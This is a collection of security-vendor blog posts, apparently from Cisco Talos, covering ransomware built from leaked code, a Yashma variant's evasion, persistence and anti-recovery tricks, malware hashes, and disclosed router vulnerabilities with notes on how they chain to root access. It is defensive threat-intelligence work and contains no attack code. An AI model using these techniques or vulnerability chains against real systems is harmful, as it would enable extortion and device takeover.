Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware’s behavior. It is usually complex and often requires skilled technicians to create. Therefore, having access to such code allows threat actors with minimum programming knowledge to modify and compile their own ransomware variants.

Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed. The availability of such builders allows novice actors to generate their own customized ransomware variants. An example of a leaked Chaos ransomware builder V5 is shown in the picture below.

Code leaks are causing an influx of new ransomware actors

When ransomware source code or builders are leaked, it becomes easier for aspiring cybercriminals who lack the technical expertise to develop their own ransomware variants by making only minor modifications to the original code. Additionally, by using leaked source code, threat actors can confuse or mislead investigators, as security professionals may be more likely to misattribute the activity to the wrong actor.

New variants based on leaked code are becoming more common

We have continued seeing various malicious campaigns since the start of 2023, where the threat actors have used new ransomware variants based on leaked source code or builders. Early this year, Talos discovered a new ransomware family called MortalKombat generated by the leaked Xorist ransomware builder. Xorist ransomware, which operates under the RaaS model, has a builder called “Encoder Builder v.24” that is available on underground forums. Based on our research, we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies. This campaign has a multi-stage attack chain that begins with a phishing email delivered to victims impersonating CoinPayments, a legitimate global cryptocurrency payment gateway.

In April, Talos discovered a new ransomware actor, RA Group, conducting double extortion attacks using their ransomware variant based on leaked Babuk source code. Babuk, a Russian ransomware group that emerged in 2021, has conducted a series of high-profile ransomware attacks across various industries, including government, healthcare, logistics, and professional services. Since an alleged member of the Babuk group leaked the full source code of its ransomware in September 2021, several new variants based on the leaked code have emerged, with many appearing in 2023, including ESXiArgs, Rorschach and RTM Locker, in addition to RA Group. RA Group, in its ongoing campaigns, has targeted the U.S., South Korea, Taiwan, the U.K. and India across several business verticals, including manufacturing, wealth management, insurance providers, pharmaceuticals and financial management consulting companies.

Most recently, Talos observed a surge in new ransomware strains emerging from the Yashma ransomware builder. Yashma ransomware builder, which first appeared in May 2022, is a rebranded version of the Chaos ransomware builder V5, which was leaked in April 2022. Since early 2023, we have seen several new Yashma strains emerge, including ANXZ, Sirattacker, and Shadow Men Team. Shadow Men Team — whose name we derived from a translation of their Hindi name in the ransom note — appears to be a new actor in the ransomware space. The actors appear to target victims in Kuwait, as the ransom note demands payment in Kuwaiti dinar before translating that sum to its U.S. dollar equivalent in Bitcoin.

Another new actor we discovered, seemingly of Vietnamese origin, uses a Yashma ransomware variant to target victims in Bulgaria, China, Vietnam and other countries. The campaign started in at least June 2023, and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017.

Actors repurposing leaked code are demanding low ransom payments

Cybercriminals leveraging leaked code and builders are seemingly more conservative in their ransom demands, a possible indication that they are lone wolf operators, proceeding cautiously as they test their new variants or are new players in this space. Actors behind many of these new ransomware variants, including Sirattacker, Chaos 2.0, Chaos 4.0, DCrypt, and Shadow Men Team, are demanding payments ranging from USD $3.50 to $4,390 in Bitcoin from victims. These ransom demands are significantly lower than those made by many well-known ransomware gangs like RYUK, Babuk, REvil, Conti, DarkSide, BlackMatter, BlackCat, and Yanluowang, which are typically in the millions of dollars. These more profitable groups usually operate under the RaaS model, meaning their affiliates are free to set their own (often high) ransom demands, and/or are structured so they pay their operators and developers, thereby driving up the amount of money they seek to take in during the course of their operations.

Below is a comparison of ransom demands made by actors using leaked code or builders and well-known ransomware gangs.

Code leaks are causing an influx of new ransomware actors

Opportunities for security researchers and defenders

While these changes in the threat landscape have largely benefitted threat actors, security researchers and defenders also have an advantage with access to the leaked code. It allows security researchers to analyze the source code and understand the attacker’s tactics, techniques and procedures (TTPs), which helps security professionals develop effective detection rules and enhance security products' capabilities in combating ransomware threats.

By analyzing the source code, researchers can identify similar patterns and techniques used by different threat actors, providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack. Security researchers can also share the intelligence information derived from the leaked code with the broader security community, thereby contributing to strengthening the cybersecurity space. By understanding the TTPs of the leaked source codes, defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

7 August 2023 at 12:00
  • Cisco Talos discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that began at least as early as June 4, 2023.
  • This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics.
  • The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.

Threat actor analysis

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, “nguyenvietphat,” has ransomware notes written in these countries’ languages. The presence of an English version could indicate the actor intends to target a wide range of geographic areas.

Talos assesses with moderate confidence that the threat actor may be of Vietnamese origin because their GitHub account name and email contact on the ransomware notes spoofs a legitimate Vietnamese organization’s name. The ransom note also asks victims to contact them between 7 and 11 p.m. UTC+7, which overlaps with Vietnam’s time zone. We also spotted a slight difference in the Vietnamese language ransom note, as it starts with, “Sorry, your file is encrypted!” in contrast to the others that begin with, “Oops, your files are encrypted!” By saying “sorry,” the threat actor may have intended to show a heightened sensitivity toward victims in Vietnam, which could indicate the attackers themselves are Vietnamese.

We further assess the threat actor began this campaign around June 4, 2023, because they joined GitHub and created a public repository called “Ransomware” on that date, which overlaps with the compilation date of the ransomware binary. In the repository, they added ransom note text files in five languages: English, Bulgarian, Vietnamese, Simplified Chinese and Traditional Chinese.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware
GitHub repository that contains ransom notes.

Ransom note

The actor demands the ransom payment in Bitcoins to the wallet address “bc1qtd4qv0wmgtu2rdr0wr8tka2jg44cgmz04z5mc7” and they double the ransomware price if the victim fails to pay within three days, according to our ransomware note analysis. The actor has an email address, “nguyenvietphat[.]n[at]gmail[.]com,” for the victims to contact them. At the time of our analysis, we had not observed any Bitcoin in the wallet, and the ransom note did not specify an amount, indicating the ransomware operation might still be in a nascent stage.

The ransom note text resembles the well-known WannaCry ransom note, possibly to obfuscate the threat actor’s identity and confuse incident responders.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware
The ransom note for WannaCry ransomware.

Ransom notes samples of the Yashma variant.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

After encryption, the Yashma ransomware variant sets the wallpaper on the victim’s machine, as seen in the image below. It seems that the operator downloaded this picture from www[.]FXXZ[.]com and embedded it in the Yashma variant binary. The wallpaper set by the Yashma variant in the victim’s machine also mimics the WannaCry ransomware.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

Yashma variant wallpaper (left) and WannaCry wallpaper (right).

Customized Yashma ransomware variant

The actor deployed a variant of Yashma ransomware, which they compiled on June 4, 2023.  Yashma is a 32-bit executable written in .Net and a rebranded version of Chaos ransomware V5, which appeared in May 2022. In this variant, most of Yashma’s features remained unchanged and have been described by the security researchers at Blackberry, with the exception of a few notable modifications.

Usually, ransomware stores the ransom note text as strings in the binary. However, this variant of Yashma executes an embedded batch file, which has the commands to download the ransom note from the actor-controlled GitHub repository. This modification evades endpoint detection solutions and anti-virus software, which usually detect embedded ransom note strings in the binary.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware
Contents of the batch file.

Earlier versions of the Yashma ransomware established persistence on the victim machine in the Run registry key and by dropping a Windows shortcut file pointing to the ransomware executable path in the startup folder. The variant we observed also established persistence in the Run registry key. Still, it was modified to create a “.url” bookmark file in the startup folder that points to the dropped executable located at “%AppData%\Roaming\svchost.exe”.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware
A function that creates the bookmark file.

One notable feature the threat actor chose to keep in this variant is Yashma’s anti-recovery capability. After encrypting a file, the ransomware wipes the contents of the original unencrypted files, writes a single character “?” and then deletes the file. This technique makes it more challenging for incident responders and forensic analysts to recover the deleted files from the victim’s hard drive.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware
The code snippet shows the anti-recovery feature of the ransomware.

Coverage

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 62131 - 62143 and 300633 - 300638.

ClamAV detections are available for this threat:

Win.Ransomware.Hydracrypt-9878672-0

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

IOCs

Indicators of Compromise associated with this threat can be found here.

Previewing Talos at BlackHat 2023

3 August 2023 at 18:00
Previewing Talos at BlackHat 2023

Welcome to this week’s edition of the Threat Source newsletter.

The time has come once again for all of us (well, not me specifically but lots of other Talos people) to descend on Las Vegas for Hacker Summer Camp. Cisco Talos will be well-represented at BlackHat and DEF CON over the course of the next few weeks with a slew of presentations, demos and appearances to speak to the security community.

As always, we’ll be at the Cisco booth at BlackHat, located just north of the main entrance (it’s #1532 if you’re searching!). If you need help finding us, download the BlackHat app to see a map of the entire conference. Talos researchers will be at the booth throughout the conference to give lightning talks on a wide range of topics — everything from machine learning to the basics of spotting phishing emails. New talks will take place every other half hour starting at 10 a.m. local time on Wednesday.

We’ll also have a presence at the BlackHat Career Zone — diagonal from Startup City on the show floor at Kiosk #CZ2 — throughout the conference, where you can talk to us about current job openings, ask for advice on career advancement or just talk about future opportunities for how you could become part of our team. On Thursday, Aug. 10, from 10 a.m. - noon local time, we’ll have Talos hiring managers at the Cisco booth to also talk about potential job opportunities.

The highlight of BlackHat is our sponsored talk on Aug. 9 at 11:30 a.m. local time in Business Hall Theater A. Nick Biasini, our head of Outreach, joins Cisco’s Vice President of Product Management for Threat, Detection and Response A.J. Shipley to talk about Cisco XDR. Learn how the newest offering from Cisco Secure combines telemetry from multiple sources and applies analytics to uncover malicious activities and attacker tactics, techniques and procedures (TTPs).

The following week at DEF CON, Vitor Ventura and Asheer Malhotra will be at the Crypto and Privacy Village, delivering a talk on “Mercenary” threat actors and the spyware they create on the Saturday of the conference at 6 p.m local time. Asheer and Vitor have written extensively about this topic and why the malware they’re creating and selling is potentially more dangerous than “traditional” spyware.

Keep an eye out on our Twitter (or X, whatever we’re calling it) for more information about a live Beers with Talos podcast recording and other opportunities to ask our researchers questions.

If you're flying out to Vegas for either conference, make sure to bookmark our Half-Year in Review to read during your travels. This is a great overview of the top threats of 2023 so far this year and looks at where the cybersecurity landscape might head next.

The one big thing

Since the discovery of the high-profile VPNFilter malware in 2018, our vulnerability research team has had a renewed focus on small and home office (SOHO) wireless routers. These are devices that are present in almost every house and business in the modern world because they are necessary to deliver the internet to multiple devices everyone possesses and relies on today. Over the past four-plus years, Talos worked with multiple vendors to disclose and patch nearly 290 CVEs in a wide range of products and libraries these routers use. This week, we released a full rundown of all these vulnerabilities and what the major takeaways are for users and the manufacturers behind these products.

Why do I care?

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices. Since VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. Our reports to these vendors resulted in appropriate Snort network intrusion detection coverage and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.

So now what?

The most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable.

Top security headlines of the week

American military officials and cybersecurity experts are actively hunting for malware that is reportedly loaded onto systems belonging to major power and water suppliers and communications systems that service U.S. military bases. A new report from the New York Times states that the malware is a “ticking time bomb” that could disrupt U.S. military operations in the event of a direct or indirect military conflict with China. Sources in the report indicated that the malware comes from a Chinese state-sponsored actor that may be working for the People’s Liberation Army. While the government is still actively hunting for the malicious code, it is apparently hidden deep within targeted networks and has taken months to find. Microsoft and the White House disclosed that Chinese state-sponsored actors accessed the emails of at least two dozen American organizations, including some federal government agencies. (The New York Times, CNN)

The effects of the MOVEit data breach continue to spread. Government contractor Maximus disclosed last week that, although its systems were not directly affected by the Clop ransomware gang’s attack on the MOVEit file transfer software, as many as 8 million to 11 million individuals’ personal information may have been compromised. The company said in a filing to the U.S. Securities and Exchange Commission that attackers may have accessed files that "contain personal information, including Social Security numbers, protected health information, and/or other personal information, of at least 8-to-11 million individuals.” Clop claims on its leak site that it stole 169 GB of data from Maximus. More than 200 organizations have reportedly been affected by the MOVEit breach. (TechCrunch, Dark Reading)

Russian state-sponsored actors are suspected to be behind a series of denial-of-service attacks against multiple Italian banks on Wednesday, leaving many consumers unable to access their accounts. Italy’s cybersecurity agency said at least five banks were affected, though they were able to restore services fairly quickly. The group NoName057(16) took credit for the attacks on its Telegram channels, accusing Italian government officials of being anti-Russian and supporting Ukraine. Security researchers said the DDoS attacks caused “short-lived disruption with little to no wider consequence.” Actors with potential links to Russia have been behind several recent high-profile denial-of-service attacks, including against video game company Blizzard and Microsoft Outlook. (Reuters, The Record by Recorded Future)

Can’t get enough Talos?

Upcoming events where you can find Talos

BlackHat (Aug. 5 - 10)

Las Vegas, Nevada

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week


SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b
MD5: f5e908f1fac5f98ec63e3ec355ef6279
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::tpd

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c
MD5: a087b2e6ec57b08c0d0750c60f96a74c
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Kmsauto::1201

Half-Year in Review: Recapping the top threats and security trends so far in 2023

3 August 2023 at 12:00
Half-Year in Review: Recapping the top threats and security trends so far in 2023

From new ransomware groups, a growing mercenary space, espionage campaigns, supply chain attacks, and new “as a service” tools popping up, there's a lot to talk about already in the first half of 2023.

Here are the main threats we've covered on our blog up until the end of June 2023. The timeline is a blend of threat advisory articles, and long-term research that our analysts have been working on for a while.


Be sure to subscribe to blog.talosintelligence.com to get future blogs sent straight to your inbox. You can also follow our ongoing Vulnerability Roundup series, where we run down the latest vulnerabilities, attack scenarios, and coverage.

Threat trends

Many of the threats we've written about this year have involved extortion as part of the attackers’ plans. We've seen threat actors utilize every chance they get to steal sensitive data, to be used in future attacks and/or to manipulate victims into paying up before their data ends up on the dark web. Another growing trend is the mercenary landscape – “hackers for hire” growing their wares and increasingly commercializing tools, such as spyware.

The mercenary space is a topic we'll talk more about in the “2023 Year in Review” which Cisco Talos researchers, detection specialists, linguists, threat hunters, incident responders, and analysts are now actively working on, and will be published later this year.

Last year’s inaugural report represented an unprecedented effort within Cisco to tell a comprehensive story of our work, relying on a wide variety of data and expertise. This year, we are bringing all these elements together again, to report on how the threat landscape has changed from 2022 and delve deep into some of the most notorious and impactful threats of 2023.

The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter

2 August 2023 at 12:00
  • Since the discovery of the widespread VPNFilter malware in 2018, Cisco Talos researchers have been researching vulnerabilities in small and home office (SOHO) and industrial routers.
  • During that research, Talos has worked with vendors to report and mitigate these vulnerabilities, totaling 141 advisories covering 289 CVEs across multiple routers.
  • Talos is highlighting some of the major issues our researchers discovered over the past several years, including vulnerabilities that an attacker could mostly directly access or those an adversary could chain together to gain elevated access to the devices.
  • There are several Snort rules that can detect possible exploitation of the vulnerabilities included in this post.
The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter

Small office/home office (SOHO) routers and small-scale industrial routers are fairly common targets for bad actors because these devices are nearly in every home and small business. Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices.

In 2018, Talos uncovered and published an article about the VPNFilter malware aimed at SOHO network equipment. This malware had the ability to completely compromise or wipe a targeted device. Since then, numerous reports of sophisticated actors targeting SOHO routers have come to light: Talos recently released a blog post discussing our concern by an increase in state-sponsored campaigns targeting network infrastructure. Microsoft discussed state-sponsored actors using SOHO routers to obfuscate their operations at CyberWarCon 2022. While Lumen recently highlighted that criminal actors are also targeting SOHO routers to support their operations

The Talos Vulnerability Discovery and Research Team — our world-class team of researchers who work with third-party vendors to disclose and patch vulnerabilities in a variety of software and hardware — made SOHO and industrial routers a major priority after VPNFilter. By helping vendors mitigate the vulnerabilities on these devices, we make life harder for malicious actors.

Since VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. As a direct result of this research, Talos has reported 289 CVEs to vendors, published across 141 Talos reports. These reports resulted in appropriate Snort network intrusion detection coverage and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.

In this blog post, we provide a summary of the vulnerabilities we discovered in these devices, specifically focusing on vulnerabilities adversaries were most likely to exploit, or ones that could be chained together to gain an elevated level of access to the device or network. This is by no means the end of our research into SOHO or industrial routers. We plan to continue investigating these types of devices to better protect our customers and the community as a whole.

Routers

ASUS RT-AX82-U

Research conducted by Lilith Wyatt.

Background

Our researchers chose to examine the ASUS RT-AX82-U because it is a very popular router and it shares a codebase with a plethora of other ASUS routers. Over the course of the research, Talos submitted three unique reports to ASUS, resulting in three CVEs. The ASUS RT-AX82-U contains a large amount of open-source code in the form of the asus-merlin-ng firmware. During this research, this section of code was avoided in favor of device- and feature-specific codebases within the device, including smart home integrations and the AiMesh functionality. The smart home integration features are designed for integration with Amazon Alexa or the “If This, Then That” (IFTTT) automation framework to provide more easily accessible functionality or automation. The AiMesh feature is a mesh networking solution designed to allow for multiple routers to work together to provide Wi-Fi connectivity over a larger area from a single network connection point. These features are enabled by default in the stock configuration of the device. This means that, without explicit effort by a user to disable these features, all ASUS RT-AX82-U devices could be targets.

Notable Vulnerabilities

  • TALOS-2022-1586: This vulnerability existed in the smart home integration features of the router. If a user ever generates a token to use with IFTTT, an authentication token is generated to allow functionality to be leveraged on the router. This token can be easily brute-forced, as there are only 255 possible combinations, and the validity is measured based on when the token was generated and the device's uptime. This means if the router is rebooted, this vulnerability is exploitable up until the time (in seconds from reboot) the token was originally created, instead of the intended two-minute timeout. Leveraging this vulnerability allows an attacker to gain administrative privileges on the router as if they were properly authenticated.
  • TALOS-2022-1590: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication control messages, an improperly sized read can be used to leak information that can be decrypted locally based on known plaintext. This is possible because the provided length of a user-supplied AES key, which needs to be a set size based on the AES variant used (in this case AES-256), is not checked. By providing a key smaller than the required size, extra information can be returned to the user.
  • TALOS-2022-1592: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication diagnostic messages, an improperly sized packet can lead to a denial of service. This is possible due to the lack of length validation on packets ingested, which leads to an integer underflow. This integer underflow is then utilized in a read loop that ends in accessing unmapped memory, causing a crash.

Observations

The primary issue in the Asus RT-AX82-U came from the inclusion of services that do not necessarily need to be activated by default. The smart home integration service should be disabled by default, as it is by no means required for the operation of the router and likely is not utilized in most scenarios. The AiMesh service could be disabled by default and only enabled if a user wants to utilize a mesh network. While disabling this functionality would not have removed the vulnerabilities from the device, it would significantly reduce the attack surface as well as reduce the number of deployments that had devices in vulnerable states.

D-Link DIR-3040

Research conducted by Dave McDaniel.

Background

The D-Link DIR-3040 is another popular device and was an interesting subject for our researchers because of the mesh communications used between nodes to provide improved Wi-Fi coverage wherever the device is deployed. Over the course of the research, Talos submitted six unique reports to D-Link, resulting in six CVEs. The research targeting the D-Link DIR-3040 focused on all aspects of the device in a stock configuration of the device. This included the web services — including hidden diagnostic services — and Wi-Fi mesh networking implementation, as well as other general security issues. The Wi-Fi mesh networking implementation allows for multiple routers to connect together to provide increased network coverage.

Notable Vulnerabilities

  • TALOS-2021-1284: This vulnerability was a combination of web server functionality and an issue within hidden functionality. By visiting a hidden URL of the router, an attacker could activate a hidden telnet console used for diagnostics. Within this diagnostics menu, multiple commands within the restricted shell lacked proper input sanitization and, as such, allowed arbitrary command injection.
  • TALOS-2021-1361: Talos discovered this vulnerability within the Wi-Fi mesh networking service enabled by default on the device. By utilizing hard-coded credentials, an attacker could connect to the MQTT server. Once connected, an attacker could query information about the mesh. This information was encrypted but could be decrypted utilizing the MAC address of the base router, which was found in the same message. Once decrypted, the root password for the primary router could be recovered.
  • TALOS-2021-1281: Talos discovered this vulnerability within the Zebra network management service which was enabled by default on the router. By utilizing hard-coded credentials for this service, an attacker could access diagnostic tooling for the router. An adversary could change the service login banner to a file to leak sensitive information otherwise inaccessible via this service.

Observations

The DIR-3040 web server contains hidden paths to access debugging functionality on the device. There is no reason to hide this functionality, and it is better off as an explicit option that a user has to manually enable. Hard-coded credentials should also never be included in modern devices. Finally, as with the RT-AX82-U, the MQTT server related to mesh communication should not be enabled unless a feature that requires the MQTT server is enabled by a user during setup or other configuration.

InHand Network InRouter 302

Research conducted by Francesco Benvenuto.

Background

Our researchers examined the InHand Network InRouter 302 because three ATM providers claimed to have used this device: Wireless ATM STORE.COM, Wincor Nixdorf and UnionPay. Over the course of the research, Talos submitted 23 unique reports to InHand, resulting in 25 CVEs. The research targeting the InHand Network InRouter 302 focused on all aspects of the device in a stock configuration of the device. This included the web server, API services and general security issues. The web server contained multiple vulnerabilities, including cross-site scripting and common gateway interface (CGI) issues. The console utilities of InRouter also contained numerous vulnerabilities. During the course of this research, an interesting unescape vulnerability was identified that spanned numerous open-source projects and closed-source products. This vulnerability will be discussed more in-depth in the Siretta router section.

Notable Vulnerabilities

  • TALOS-2022-1469: This vulnerability existed in the HTTP server. It exploits the /info.jsp endpoint, which is normally only used by web pages themselves. The endpoint will effectively eval the parameter sent as a Javascript command. Because the endpoint is not limited in access, this leads to a cross-site scripting (XSS) vulnerability.
  • TALOS-2022-1472: This vulnerability existed in the HTTP server. Because of improper access control, a low-privileged user could update the router configuration, enabling them to change to privileged user credentials, resulting in privilege escalation.
  • TALOS-2022-1476: The vulnerability existed within the restricted console presented to a user when using SSH or Telnet. This console contained multiple commands, including factory, a command that only the most-privileged user could execute. By utilizing this command, an attacker could use this (presumed) debug functionality to overflow the stack buffer used to hold the user data while it was being parsed. This vulnerability could lead to arbitrary code execution.

Observations

These three vulnerabilities would allow an attacker to obtain root access to the device starting with a single click. TALOS-2022-1469 is an XSS vulnerability that could allow an attacker to exfiltrate the session cookie of a logged-in user. If the session cookie belonged to a low-privileged user, an attacker could chain TALOS-2022-1472 to update the router’s configuration, enabling them to change privileged user credentials, resulting in privilege escalation. An attacker, at this point, would have the most elevated permitted credentials, but no root access. However, by exploiting TALOS-2022-1476, an attacker would be able to obtain, through a stack-based buffer overflow, remote command execution.

We wrote an extensive blog post that discusses, in-depth, how an attacker could chain the vulnerabilities discovered to obtain remote command execution in the InHand Network InRouter 302 with a one-click attack.

Linksys E Series

Research conducted by a researcher within Cisco Talos.

Background

The Linksys E Series devices were directly affected by the VPNFilter campaign. The E1200 and E2500 are two SOHO routers offered by various vendors over the years, most recently Linksys. The devices target low-budget installations, providing four Ethernet ports for additional device connections. The E Series provides a web-based management console to allow owners to make administrative changes to the system configuration. This web console also provided the main attack surface during our analysis of the device.

Notable Vulnerability

  • TALOS-2018-0625: This disclosure contains three related authenticated command injection vulnerabilities, all accessible via the web-based management portal. Many of the configuration details passed to E Series routers during configuration must be retained across a device’s power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. Three paths exist where one of two parameters, `machine_name` or `wan_domain`, are retrieved from NVRAM and subsequently used directly in a command passed to `system()`.

Milesight UR32L and MilesightVPN

Research conducted by Francesco Benvenuto.

Background

The Milesight UR32L is an industrial router that offers a good tradeoff between price and functionalities. The vendor also provides software for a remote access solution called MilesightVPN which, theoretically, allows the UR32L to be less exposed, thus making it more difficult for an attacker to target it. Over the course of the UR32L research, Talos submitted 17 unique reports to Milesight, resulting in 63 CVEs. Talos researchers also sent Milesight five unique reports for the VPN solution, resulting in six CVEs. This research focused mainly on two components: its HTTP server with its related components and the router console shell. Our analysis also considered the attack scenario in which the user is using Milesight's MilesightVPN, so as to investigate a more complete attack scenario.

Notable Vulnerabilities

  • TALOS-2023-1701: This vulnerability existed in the HTTP server login functionality of the MilesightVPN. This is an SQL injection vulnerability that would allow an attacker to bypass the web login and grant access to the administrative web pages. This in turn allows an attacker to communicate with routers connected to the VPN.
  • TALOS-2023-1697: This vulnerability existed in the HTTP server login functionality of the UR32L. This is the most severe vulnerability found on the router. Indeed, it is a pre-authentication remote stack-based buffer overflow. An unauthenticated attacker able to communicate with the HTTP server would be able to perform remote command execution. One way to communicate with the HTTP server remotely is by using TALOS-2023-1701.
  • TALOS-2023-1706: The UR32L offers different diagnostic functionalities within its HTTP server, like ping and trace. Both of these vulnerabilities have an OS command injection vulnerability through the specified host. An attacker with low-privilege credentials in the UR32L could exploit these vulnerabilities and execute remote commands.

Observations

The vendor provides MilesightVPN software, a remote access solution. The underlying idea is that by using this software, Milesight’s UR32L would not need to be exposed to the internet, thus reducing the attack surface and making it more difficult for an attacker to target it. During our research, we took into consideration this scenario and demonstrated that unfortunately, an attacker can use TALOS-2023-1701 to attack the remote access solution software and then execute arbitrary code inside the UR32L by using TALOS-2023-1697.

Netgear Orbi Router RBR750/RBS750

Research conducted by Dave McDaniel.

Background

The Netgear Orbi RBR750/RBS750 was chosen due to its popularity and reputation of quality. This device is widely adopted as a high-end SOHO router choice and also utilizes a mesh network to connect satellites. Over the course of the research, Talos submitted four unique reports to Netgear, resulting in four CVEs. This research of the Netgear Orbi Router RBR750 focused on multiple services across the devices, such as the management web server and services provided by the device on the local network. The network services included hidden functionality that could be activated using a special network packet. The Orbi utilizes the open-source OpenWrt ubus code base for communication between the satellites and primary router, but also includes hidden additional functionality on top of this library.

Notable Vulnerabilities

  • TALOS-2022-1595: This vulnerability is based on the existence of an undocumented service listening on UDP port 23. This service listened for an encrypted packet containing the MAC address, username and password of the br-lan interface of the device. The encryption used was a modified blowfish algorithm similar to those used for the Nintendo DS handheld video game system’s cartridge copyright protection. Once the packet was retrieved, a telnet daemon was spawned which allowed direct access to the underlying busybox system.
  • TALOS-2022-1596: This vulnerability existed in the web-based administration of the Orbi. Within the web interface, there was functionality to block specific devices specified by MAC address and device name. The device name field of the associated POST request is vulnerable to command injection due to a lack of user-input sanitization. An attacker could craft a malicious packet to execute arbitrary commands on the device with root privileges.
